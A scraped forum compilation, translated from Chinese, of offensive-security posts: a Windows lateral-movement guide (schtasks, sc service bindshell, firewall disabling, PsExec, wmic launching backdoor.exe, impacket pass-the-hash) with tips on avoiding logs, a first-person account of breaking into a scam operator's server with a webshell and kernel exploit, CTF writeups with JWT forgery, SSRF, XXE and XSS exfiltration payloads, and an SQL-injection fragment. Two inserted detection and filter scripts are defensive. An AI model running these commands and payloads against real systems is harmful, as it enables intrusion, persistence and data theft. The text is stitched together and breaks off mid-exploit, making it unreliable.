net use \\10.10.10.10\IPC$ "admin!@#456" /user:"administrator"

At this point, if you have sufficient permissions, you can use the dir or copy command to view the information of the target host.

Security considerations: these commands are executed locally as remote commands, so they leave no log information on the remotely connected host, and are therefore relatively safe.

Build an SMB server
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%BC%80%E5%90%AFWindows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%8C%BF%E5%90%8D%E8%AE%BF%E9%97%AE%E5%85%B1%E4%BA%AB

SMB (Server Message Block), also known as CIFS (network file sharing system), is an application-layer network transfer protocol. It is generally sent over NetBIOS or TCP and uses port 139 or 445. Create an SMB server that both parties can access for intranet penetration, and let the victim host remotely load Trojans and perform other operations to control the target host.

The difference between the CIFS protocol and the SMB protocol

Ideas about CIFS permissions: if we take down a machine and there are vulnerabilities such as constrained delegation or silver tickets, we obtain the domain controller's CIFS permissions through those operations. Then we can use tools such as psexec.py and smbexec.py in the impacket toolkit with the -no-pass -k parameters to directly connect to the domain controller and obtain permissions by reading the local tickets. However, when the impacket toolkit uses the -no-pass -k parameters, it looks for .ccache tickets, while Windows uses .kirbi tickets, so it cannot succeed on Windows; it can succeed on Linux. If you can obtain the domain controller's CIFS permission, modify the impacket tool or write other tools, and use the CIFS permission to directly take over the domain controller.

Scheduled tasks

The execution method is the same as the VPN and socks method. Generally speaking, administrator credentials must be obtained before a scheduled task can be executed. By building an SMB server or establishing a shared connection, the target machine downloads and runs the script, and then a scheduled task is established to execute the script, load Trojans, etc.

When the target system version is below Windows 2012, use at:

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator   # Establish an IPC connection
copy add.bat \\192.168.3.21\c$   # Copy the executable file to the target machine
at \\192.168.3.21 15:47 c:\add.bat   # Add a scheduled task

When the target system version is Windows 2012 or later, use schtasks:

net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator   # Establish an IPC connection
copy add.bat \\192.168.3.32\c$   # Copy the file to its C drive
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F   # Create the adduser task for the corresponding executable

/s: specify the system to connect to;
/ru: specify the user permissions the scheduled task runs with;
/tn: specify the name of the scheduled task to create;
/sc: specify the frequency of execution of the scheduled task;
/tr: specify the path of the program the scheduled task runs;
/F: force creation if the specified task exists;
/mo: specify the execution cycle of the scheduled task;

schtasks /query /s 10.10.10.10 /TN c   # View the status of scheduled task c
schtasks /run /s 192.168.3.32 /tn adduser /i   # Run the adduser task
schtasks /delete /s 192.168.3.21 /tn adduser /f   # Delete the adduser task

Note that the program a scheduled task executes runs in the background and has no echo.

In terms of logging, as long as a remote connection operation is performed, using the IP produces an NTLM authentication packet, and using the domain name or machine name produces a Kerberos authentication packet. The addition, deletion, execution and other operations of scheduled tasks are also reflected on the target host.

Microsoft-Windows-TaskScheduler/Operational: this event log records operations on scheduled tasks, including creation, modification and deletion. You can find this log in the Windows Event Viewer; the path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Operational.

Microsoft-Windows-TaskScheduler/Maintenance: this event log records the execution of scheduled tasks, including task start, completion and error information. You can also find this log in the Windows Event Viewer; the path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Maintenance.

Security considerations: although the scheduled task is executed remotely, a scheduled task process is established on the target host, and that process executes files on the target host. These behaviors leave log records on the target host, so it is more dangerous.

System services

The execution method is the same as the VPN and socks method. You can also run specified programs or commands on the remote host by creating system services on the remote host. This method requires administrator rights on both hosts.

sc \\[Hostname/IP] create [servicename] binpath= "[path]"   # Create a service that starts the program
sc \\10.10.10.10 create bindshell binpath= "c:\bind.exe"

Note the format here: there must be a space after "=", otherwise an error occurs.

Start the service:

sc \\10.10.10.10 start bindshell

Delete the service:

sc \\[host] delete [servicename]   # Delete the service

We can also turn off the firewall by setting up a service:

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start unablefirewall

In terms of logging, as long as a remote connection operation is performed, using the IP produces an NTLM authentication packet, and using the domain name or machine name produces a Kerberos authentication packet. The logs of system services also leave traces.

Security considerations: creating system services creates services on the remote host and leaves log records on the target host, so it is more dangerous.

PsExec

The execution method is the same as the VPN and socks method.

PsTools' psexec connects to the Admin$ share of the server through SMB, releases a binary file named "psexesvc.exe", and then registers a service named "PSEXEC". When a command is executed, the corresponding program is started through the service to execute the command and return the output. After the run is completed, the PSEXESVC service is deleted. Therefore, the conditions required to run psexec are:
1. The target host has Admin$ sharing enabled;
2. Port 139 or 445 is open to run SMB;
3. Permission on the target host to create a service is needed;

PsExec.exe -accepteula \\192.168.52.138 -u god\liukaifeng01 -p Liufupeng123 -i -s cmd.exe

-accepteula: the first time you run psexec, a confirmation box pops up; using this parameter suppresses it.
-u: username
-p: password
-s: run the remote process with SYSTEM permissions and obtain an interactive shell with SYSTEM permissions. If this parameter is not used, a shell with the permissions of the user used to connect is obtained.

The impacket package's psexec.py allows you to execute processes on remote Windows systems, copy files, and return the output of the processing. In addition, it allows you to execute remote shell commands directly using a fully interactive console (no need to install any client software).

python psexec.py [[domain/]username[:password]@][Target IP Address]
python psexec.py VVVV1/admins:User\!@#[email protected]

# Obtain an interactive shell as the target domain user through a hash connection
python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected]

The commands for the Python file and the exe file are the same. When using psexec, not only is a login log generated on the domain controller, but log information is also generated on the target machine.

Event ID: 7045

Using the official PsExec tools

When using the psexec tool in the impacket package to connect, it is found that the generated service name is automatically modified (which has a certain hiding effect on the service).

Security analysis: when psexec is executed, it not only uploads a file but also creates a service. These are logged by the target host, so it is more dangerous.

WMI

The execution method is the same as the VPN and socks method.

The full name of WMI is Windows Management Instrumentation, and users can manage local and remote computers through WMI. The protocols used by WMI are DCOM (Distributed Component Object Model) and WinRM (Windows Remote Management).

Conditions required to run WMI:
1. The WMI service of the remote host is enabled;
2. Both hosts open port 135;

On Windows you can use wmic.exe and PowerShell cmdlets to use WMI data and execute WMI methods.

wmic /node:192.168.183.130 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
// wmic /node:"[full machine name]" /USER:"[domain]\[username]" PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

Query remote process information:

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process list brief

wmic command execution has no echo, so the result is written to a txt file:

wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "cmd.exe /c ipconfig > C:\result.txt"
wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "cmd.exe /c command > C:\result.txt"
wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create "directory\backdoor.exe"
// /node: specify the server to operate on

In terms of logging, as long as a remote connection operation is performed, using the IP produces an NTLM authentication packet, and using the domain name or machine name
is a Kerberos authentication packet. Except for authentication operations, wmic remote execution commands will not generate logs in normal circumstances. Only the command line audit function is turned on. When using wmic commands to perform any operations, the relevant events will be recorded in the Windows event log. DCOM Utilization The execution method is the same as the VPN and socks method. https://www.freebuf.com/articles/web/293280.html WinRM utilization The execution method is the same as the VPN and socks method. http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_4124.htmlWinRM implements remote management by executing the WS-management protocol, allowing Windows computers in the same network to access and exchange information with each other, and the corresponding port is 5985. In servers with Windows-2008 or above, the WinRM service will be automatically started. When using WinRM service for horizontal movement, you need to have the administrator credentials of the remote host. Install WinRM service 1. Check whether to enable winrm winrm e winrm/config/listener If the error is reported, it is not enabled 2. Turn on the service To use CMD in administrator mode. Because Powershell will not be executed winrm quickconfig There will be two questions, just enter "y" 3. Winrm service setting auth winrm set winrm/config/service/auth '@{Basic='true'}' 4. Configure the encryption method for winrm service to allow non-encryption (if this is not configured, a remote connection will cause an error) winrm set winrm/config/service '@{AllowUnencrypted='true'}' 5. 
Check winrm configuration winrm get winrm/config Configure TrustedHosts winrm set winrm/config/client @{TrustedHosts='10.10.10.10'} #Trusted Host 10.10.10.10 Set-Item WSMan:localhost\client\trustedhosts -value * #powershell Trust all hosts Command execution winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'whoami' winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'cmd' In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. Except for authentication operations, winRM remote execution of commands will not generate logs in normal circumstances. Linux performs horizontal penetration Generally, horizontal penetration is performed in Linux, and the Impacket toolkit is used for penetration, which is a python script. wmiexec.py The execution method is the same as the VPN and socks method. It generates a semi-interactive shell using Windows Management Instrumentation and runs as an administrator. You don't need to install any service/agent on the target server, so it's very hidden. python wmiexec.py [[domain/] username [: password] @] [Target IP Address] python wmiexec.py VVVV1/admins:User\!@#[email protected] (Note: If there is one in the password, you need to escape it) python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] The login log is left in the domain control host, but the client host in the socks tunnel does not leave in the login log. psexec.py The execution method is the same as the VPN and socks method. Psexec.py allows you to execute processes on remote Windows systems, copy files, and return processing output results. In addition, it allows you to execute remote shell commands directly using the full interactive console (no need to install any client software). 
python psexec.py [[domain/] username [: password] @] [Target IP Address] python psexec.py VVVV1/admins:User\!@#[email protected] # Obtain the target domain user interactive shell through hash password connection python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] When using psexec, not only will the login log will be generated in the domain control, but the log information will also be generated in the target machine. Event ID: 7045 Use the official PSEXEC TOOLS When using the PSEXEC tool in the impacket package to connect, it is found that the generated service name will be automatically modified (it has a certain hidden effect on the service)
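The post keeps returning to what each technique leaves on the target: a 7045 service-installation event for psexec and sc, scheduled-task creation events for schtasks, and (only with command-line auditing on) process-creation events for wmic. The following is an added example, not code from the post, showing that detection logic run over constructed event records. The events and the normalised field names (channel, event_id, ServiceName, ImagePath, Command, ParentProcessName) are assumptions of this script, standing in for fields extracted from the real event XML.

```python
"""Added example (not code from the original post): detection logic for the
lateral-movement artefacts the post lists, run over constructed Windows event
records. The events below are made up for the example, and the normalised
field names are an assumption of this script, not an official schema."""
import re

# Constructed sample events (not real log data). Each dict is one record after
# field extraction from the XML of the corresponding Windows event.
SAMPLE_EVENTS = [
    # Sysinternals PsExec: the dropped PSEXESVC.exe is registered as a service (System 7045).
    {"channel": "System", "event_id": 7045, "host": "FILESRV01",
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # sc \\host create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
    {"channel": "System", "event_id": 7045, "host": "FILESRV01",
     "ServiceName": "unablefirewall",
     "ImagePath": "netsh advfirewall set allprofiles state off"},
    # schtasks /create /s host /tn adduser /tr c:\add.bat (Security 4698, task created).
    {"channel": "Security", "event_id": 4698, "host": "FILESRV01",
     "TaskName": "\\adduser", "Command": "c:\\add.bat"},
    # wmic /node:host process call create "cmd.exe /c ipconfig > C:\result.txt":
    # the child is spawned by the WMI provider host (Security 4688).
    {"channel": "Security", "event_id": 4688, "host": "FILESRV01",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c ipconfig > C:\\result.txt"},
    # Benign noise that must not fire.
    {"channel": "System", "event_id": 7045, "host": "FILESRV01",
     "ServiceName": "Sense",
     "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""},
    {"channel": "Security", "event_id": 4688, "host": "FILESRV01",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
]

# A service or task whose "binary" is really a shell / LOLBin invocation.
_COMMAND_LIKE = re.compile(
    r'^\s*"?(cmd|powershell|pwsh|netsh|rundll32|regsvr32|mshta|wscript|cscript)(\.exe)?\b',
    re.IGNORECASE)


def _low(value):
    return (value or "").lower()


def rule_psexec_service(ev):
    """Sysinternals PsExec leaves a 7045 whose service name or image path contains psexesvc."""
    if ev.get("channel") == "System" and ev.get("event_id") == 7045:
        if "psexesvc" in _low(ev.get("ServiceName")) or "psexesvc" in _low(ev.get("ImagePath")):
            return "PsExec service installed: %s -> %s" % (ev.get("ServiceName"), ev.get("ImagePath"))
    return None


def rule_command_as_service(ev):
    """sc create with binpath= set to a command line rather than a service executable."""
    if ev.get("channel") == "System" and ev.get("event_id") == 7045:
        if _COMMAND_LIKE.match(ev.get("ImagePath") or ""):
            return "service %s runs a command line: %s" % (ev.get("ServiceName"), ev.get("ImagePath"))
    return None


def rule_task_runs_script(ev):
    """schtasks /create whose action is a script or a shell command (Security 4698)."""
    if ev.get("channel") == "Security" and ev.get("event_id") == 4698:
        cmd = _low(ev.get("Command"))
        if cmd.endswith((".bat", ".cmd", ".vbs", ".ps1")) or _COMMAND_LIKE.match(cmd):
            return "task %s runs %s" % (ev.get("TaskName"), ev.get("Command"))
    return None


def rule_wmi_spawned_process(ev):
    """wmic ... process call create: the new process has WmiPrvSE.exe as its parent (Security 4688)."""
    if ev.get("channel") == "Security" and ev.get("event_id") == 4688:
        if _low(ev.get("ParentProcessName")).endswith("\\wmiprvse.exe"):
            return "process spawned by WMI provider host: %s" % ev.get("CommandLine")
    return None


RULES = (rule_psexec_service, rule_command_as_service, rule_task_runs_script, rule_wmi_spawned_process)


def detect(events):
    """Return (rule name, host, reason) for every event that matches a rule, in input order."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((rule.__name__, ev.get("host"), reason))
    return hits


if __name__ == "__main__":
    for name, host, reason in detect(SAMPLE_EVENTS):
        print("[%s] %s: %s" % (name, host, reason))
```

The WMI rule only works when process-creation auditing (4688) is enabled on the target, which is exactly the gap the post points out; the impacket variant of psexec randomises the service name, so the first rule will not catch it and one has to fall back on the second rule or on 7045 events whose image path sits in the ADMIN$ share.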
  29. Guest
    Guest posted a topic in A Test Forum
    Today a friend suddenly told me that someone had been scammed out of 1,200 yuan in a phone transfer. He was shocked. As expected, I said I'd give it a try. I got the address of the scam site, and the landing page looks like this:

Decisively collect information (because the scammer returned my friend's money after being messaged, I'll give him some face and mosaic it for the time being). Checked the ports and guessed it was built with the BT (宝塔) panel. Port 80 is open, so visit it. Following the official tutorial for locating the customer-service software, I found the admin path: /admin. Direct access, and as expected it is there. With no better idea I tried admin:123456 straight away and, unexpectedly, got in, hahaha.

The next step is getshell. I found the language configuration file is directly editable. I used a simple one-liner here and it blocked my IP. Took a look: it actually uses Cloud Shield. This scammer is a little security-conscious, so I had to bring out my Godzilla (哥斯拉) shell (it has a built-in bypass function, very handy, right?). Good guy, there are so many disabled functions; OK then, bypass them.

During file management I found that directory reads were restricted. Directly use Godzilla's directory-access bypass. While browsing the directories I found multiple PHP versions. I'm not familiar with privilege escalation on php5 (Godzilla doesn't apply there, haha); after seeing php7 I decided to look for other sites. Other sites can be accessed; the IP resolves to all of them. Finally I found a php7 one, but the Linux kernel version is very new, so privilege escalation looks like a problem. Then, as expected, Godzilla's function bypass executes commands directly and yields a low-privilege shell: the www user, with very low permissions.

A pig-butchering (杀猪盘) tool was also found in the directory: a framework that generates a link with the scam details with one click (now everyone knows not to trust QQ/WeChat transactions; this kind of pig-butchering scam fools people easily). Finally, based on the collected database connection strings and other information, take a look in the database. Godzilla's connection had problems, so I set up FRP to reach the scam server.

Information: since the www user cannot write a .so file into the mysql directory, MySQL cannot be used to escalate. sudo always asked for www's password, so sudo cannot be used either. Commands with the SUID bit set are listed below:

    /usr/bin/chage
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/mount
    /usr/bin/su
    /usr/bin/umount
    /usr/bin/pkexec
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/crontab
    /usr/bin/passwd
    /usr/sbin/grub2-set-bootflag
    /usr/sbin/unix_chkpwd
    /usr/sbin/pam_timestamp_check
    /usr/lib/polkit-1/polkit-agent-helper-1

Finally CVE-2018-18955 was used: https://www.freebuf.com/news/197122.html

Finally, the sorted information was submitted to my friend and the police, and I did not go any deeper.

This article is reproduced from: https://xz.aliyun.com/t/9200
https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486388&idx=1&sn=cfc74ce3900b5ae89478bab819ede626&chksm=ce67a12df910283b8bc136f46ebd1d8ea59fcce80bce216bdf075481578c479fefa58973d7cb&scene=21#wechat_redirect
  30. Guest
    Guest posted a topic in A Test Forum
    1. Qinglong Group (青龙组)

WEB

web1

You can log in at the start. After logging in, a token and a session are generated: one is a JWT, the other is a Flask session.

This is the original challenge; forge the JWT first: CTFtime.org/DownUnderCTF 2021 (Online)/JWT/Writeup

Create two tokens, then use the rsa_sign2n tool to recover the public key:

    python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWFhIn0.EnToBP4kzW6jbUqkC7fjt-FcCq9mOMhKWRqKpo12BsG464YTX2QNiBLuzgqJhnDlGF2Ukqb6oWXhFm0qiKrbg1skUb0FO2kMBkEvRLpyGJ7tXOzcndGDl-egaMa-mSN321RNW-aiCKJsij5Tf0HzQgBU8UCg1Zd8uJaybcj3oXOi eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEifQ.IUanU3g_ZtyPjDnOJ9gockfRo1oOQLmQT0To_WYLi9I9PluHxbBId5d2wFiF-sIhGPuDtzPvShiE1ao0qnMlp3X7pVf-Qb-juaslvbnpR1rCKH2D3Kq4u1d2wEDvsgWVtjYA6s5NXrvJpzDcpZlzmx_6Ywn8caqVQ3kjlTv87OKO

Obtained public key:

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv
    IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN
    MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502
    ZMSv0AxMgN5UMh9FCwIDAQAB
    -----END PUBLIC KEY-----

Then use RsaCtfTool to get the private key:

    -----BEGIN RSA PRIVATE KEY-----
    MIICoQIBAAKBgSSlUMfCzg/ysG4ixoi6NKGuWNnvIpZZTRNa045eH2xzzY/ZyRwD
    ojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fANMNCYRa47xIW0RwZBDSABcGnw
    u3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502ZMSv0AxMgN5UMh9FCwIDAQAB
    AoGBC5/r+nCv2+uWXTjL8i6UJtLIfdOssxKbJNiIKLXQh3l8IAAfx1i9ktxYEICW
    TcGTUkx9gjd+xUwo0KOKjcg3hZc7bEfLkiOsK8dSwsPFEXYQpCE1EFokhkc9Rbiq
    URC9QIrQjtzf5vdU2usj5ddRGtqtmpXm/ibU1TLPIsy8Y5TJAoGBAP2Mj8b+pnwu
    SCp0EYh99ogr6jblQlVwySv34UDQarcFjkQoB60SOMZpGCyPr/auhfDIsNvKyXLK
    S7IBEBFMETWywUx28OGFV7xtGF7RfLWmaKYXy4ML/DfHonV8khZ6h5wpyxPL3Wli
    uJCSSsjNgXhj4aeGLtRRuySpiXflrdFvAgElAoGBALrhzOO+tJWZQ2XPMVEqjvjl
    bXfS2WbCf/Theuzb8Zw/AxJncuj1IlXUBpZpvigTkPPd6MXIHV13j/1+3QnyyEiN
    Hf6vOHLxZq6itrDEtafqJP4vUbigr+GpSqxQChl5bNUE1QMdY3AW7LTarzZ8iq5i
    6GMi+wdRyp+GOqXd65UPAgERAoGAUjts5pfHSt6T8hfOVcf87eS6qgUqRTlWAGwR
    tCfrQkb9tT1qRfgSadzlPuJ+QirDqAm80amNcVZdvTDG8NpmckfP/R+oEcphpOUc
    qSFY4PezPMlyb7DcLcQ0sHttpmztthtkdR+GFFdedBPFOjTQC16qDNGSpbmkepfZ
    jqta99E=
    -----END RSA PRIVATE KEY-----

You can then access the game route's function. This is also an original challenge from abroad: AIS3-pre-exam-2024-Writeup | Naup's Blog

Use the emoji expression to construct cd flag;p:|cat *

⭐ Read the source code directly and you get the secret_key: 36f8efbea152e50b23290e0ed707b4b0. Then just forge the session.

Then you can use the file upload function. Let's first audit the source of this part:

    @app.route('/upload', methods=['GET', 'POST'])
    def upload():
        token = request.cookies.get('token')
        if not token:
            flash('Please login first', 'warning')
            return redirect(url_for('login'))
        payload = decode_jwt(token)
        form = UploadForm()
        if not payload or payload['username'] != 'admin':
            error_message = 'You do not have permission to access this page.Your username is not admin.'
            return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])
        if not session['role'] or session['role'] != 'admin':
            error_message = 'You do not have permission to access this page.Your role is not admin.'
            return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])
        if form.validate_on_submit():
            file = form.avatar.data
            if file:
                filename = secure_filename(file.filename)
                files = {'file': (filename, file.stream, file.content_type)}
                php_service_url = 'http://127.0.0.1/upload.php'
                response = requests.post(php_service_url, files=files)
                if response.status_code == 200:
                    flash(response.text, 'success')
                else:
                    flash('Failed to upload file to PHP service', 'danger')
        return render_template('upload.html', form=form)

    @app.route('/view_uploads', methods=['GET', 'POST'])
    def view_uploads():
        token = request.cookies.get('token')
        form = GameForm()
        if not token:
            error_message = 'Please login first'
            return render_template('view_uploads.html', form=form, error_message=error_message)
        payload = decode_jwt(token)
        if not payload:
            error_message = 'Invalid or expired token. Please login again.'
            return render_template('view_uploads.html', form=form, error_message=error_message)
        if not payload['username'] == 'admin':
            error_message = 'You do not have permission to access this page.Your username is not admin'
            return render_template('view_uploads.html', form=form, error_message=error_message)
        user_input = None
        if form.validate_on_submit():
            filepath = form.user_input.data
            pathurl = request.form.get('path')
            if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):
                error_message = 'www.testctf.com must in path and /var/www/html/uploads/must in filepath.'
                return render_template('view_uploads.html', form=form, error_message=error_message)
            params = {'s': filepath}
            try:
                response = requests.get('http://' + pathurl, params=params, timeout=1)
                return render_template('view_uploads.html', form=form, user_input=response.text)
            except:
                error_message = '500! Server Error'
                return render_template('view_uploads.html', form=form, error_message=error_message)
        return render_template('view_uploads.html', form=form, user_input=user_input)

There is a PHP service on port 80, and the /upload route can upload files into the uploads directory. You can view them through the view_uploads route, but there is a WAF:

    if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):

The domain name must be included here, and it cannot be 127.0.0.1. So 0.0.0.0 can be used instead of 127.0.0.1, and the SSRF "jump" trick can be used to bypass the domain name restriction:

    POST /view_uploads HTTP/1.1
    Host: 0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 211
    Origin: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
    Connection: close
    Referer: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732/view_uploads
    Cookie: session=eyJjc3JmX3Rva2VuIjoiYmQyNTJlZDZlYTQ5ZmJmOWQyZjJjMmQ0YTBlNjc1YzJhYzlmNmU5MyIsInJvbGUiOiJhZG1pbiJ9.ZyBmXg.eLZ3Z69hYgP6lG3vjiMNsKTLCno; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.DNqIFNdFOWgGGnuk95SQa5GdU_D6TDv95lTU97wUP8ekgqX6zrnvvsnp8XkvVfSx0g3xVQqbo5xhdxjNpM8LiiwX_kQ8FO8t0q0qBn1RJ5O2bGkGOZsUWAUrKg7ME6L4-XFiXi7P328f1t4En_kSp91SeS7-9Lcn7Ja__IJbRuH1
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i

    csrf_token=ImJkMjUyZWQ2ZWE0OWZiZjlkMmYyYzJkNGEwZTY3NWMyYWM5ZjZlOTMi.ZyBmag.RCasLc0XUU8ep682nDtSZ5PeqsQ&path=www.testctf.com@0.0.0.0&user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8&submit=Submit

Then you can upload a file first and then read it. If you find it reports "Failed to load XML File", guess that it parses XML and go straight for XXE. It filters many keywords such as SYSTEM, so use UTF-16 encoding to bypass the filter and read flag.php directly:

    <?xml version="1.0"?>
    <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.php"> ]>
    <userInfo>
      <firstName>John</firstName>
      <lastName>&example;</lastName>
    </userInfo>

    iconv -f utf8 -t utf16 1.xml > 3.xml

Then upload 3.xml, read it, and get the flag.

web2

Open the container and there is a login page; enter any account and password and you get to the vulnerable page. There is a function to send content to the boss; at a glance, XSS. Then access /flag: the boss needs to visit it. So we can submit an XSS payload that makes the boss visit /flag first and then post the data into our content:

    <script>
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.withCredentials = true;
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var flagData = xmlhttp.responseText;
            var flag1 = btoa(flagData);
            var remoteServerUrl = '/content/4a95828e3f0037bfe446ae0e693912df';
            var xmlhttp2 = new XMLHttpRequest();
            xmlhttp2.open('POST', remoteServerUrl, true);
            xmlhttp2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xmlhttp2.send('content=' + encodeURIComponent(flag1));
        }
    };
    xmlhttp.open('GET', '/flag', true);
    xmlhttp.send();
    </script>

After updating the task, send it to the boss. Then go back to the page and see that the flag has been sent.

PWN

PWN2

It starts with a login function, and you get in as long as you have the username and password. The vuln function has a two-byte overflow, and the address of buf is leaked. It also gives us a backdoor function and a /bin/sh string. Complete exp:

    from pwn import *
    elf = ELF('./short')
    context(arch=elf.arch, os=elf.os)
    context.log_level = 'debug'
    # libc = ELF('./libc.so.6')
    flag = 0
    url = '0192d6093a297e5e9de02a5fc5bb4757.tdfi.dg01.ciihw.cn'
    po
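The web1 bypass works because the view_uploads check greps the string for the host name while the HTTP client parses it as a URL: in `www.testctf.com@0.0.0.0` everything before the `@` is userinfo and the connection actually goes to 0.0.0.0. The following is an added example, not part of the original writeup, that restates the challenge's weak filter, shows which host a client really connects to, and gives a stricter check; the allowed host and upload directory are the ones in the challenge source, the stricter filter is this example's own design.

```python
"""Added example (not from the original writeup): why the view_uploads filter
accepts path=www.testctf.com@0.0.0.0, and a stricter check. The allowed host
name and upload directory are taken from the challenge source; the stricter
filter is this example's own design, not the challenge's code."""
import ipaddress
import posixpath
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.testctf.com"}
UPLOAD_DIR = "/var/www/html/uploads/"


def weak_filter(pathurl, filepath):
    """The challenge's substring check, restated. True means the request is let through."""
    if ("www.testctf.com" not in pathurl) or ("127.0.0.1" in pathurl) \
            or ("/var/www/html/uploads/" not in filepath) or ("." in filepath):
        return False
    return True


def effective_host(pathurl):
    """The host an HTTP client actually connects to for 'http://' + pathurl.
    Everything before '@' in the authority is userinfo, not the host, so
    'www.testctf.com@0.0.0.0' connects to 0.0.0.0."""
    return urlsplit("http://" + pathurl).hostname or ""


def is_forbidden_address(host):
    """True for IP literals an SSRF guard must never fetch from: loopback,
    0.0.0.0 (unspecified, which Linux treats as local), RFC 1918 and link-local."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a host name; it is checked against the allow-list instead
    return ip.is_loopback or ip.is_unspecified or ip.is_private or ip.is_link_local


def strict_filter(pathurl, filepath):
    """Parse the URL and compare the real host instead of grepping the string."""
    parts = urlsplit("http://" + pathurl)
    if parts.username is not None or parts.password is not None:
        return False  # userinfo has no legitimate use here and is the bypass vector
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS or is_forbidden_address(host):
        return False
    # Normalise the path so '..' cannot escape the upload directory; unlike the
    # original ban on '.', this still permits ordinary file extensions.
    normalised = posixpath.normpath(filepath)
    return normalised.startswith(UPLOAD_DIR)


if __name__ == "__main__":
    attack = ("www.testctf.com@0.0.0.0", "/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8")
    print("weak filter lets it through:", weak_filter(*attack))
    print("client connects to:", effective_host(attack[0]))
    print("strict filter lets it through:", strict_filter(*attack))
```

Even the strict version compares a name, not an address: a complete SSRF guard resolves the allowed name once, validates the resulting address with `is_forbidden_address`, and connects to that address, so a DNS record that later points back to 127.0.0.1 cannot be used against it.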
  31. Guest
    0x00 Encountering a chess-and-card (gambling) website
    1. A simple packet capture and analysis.
    2. Adding a single quote to the username directly produces an error; after closing the quote it works normally. A solid SQL injection.
    3. After testing, no security devices were found, so straight to sqlmap.
    4. Without dragging out the process, the following data was obtained:

        current-user: developer@%
        select @@BASEDIR: '/usr/'
        select USER(): '[email protected]'
        select DATABASE(): 'edc'
        select SYSTEM_USER(): '[email protected]'
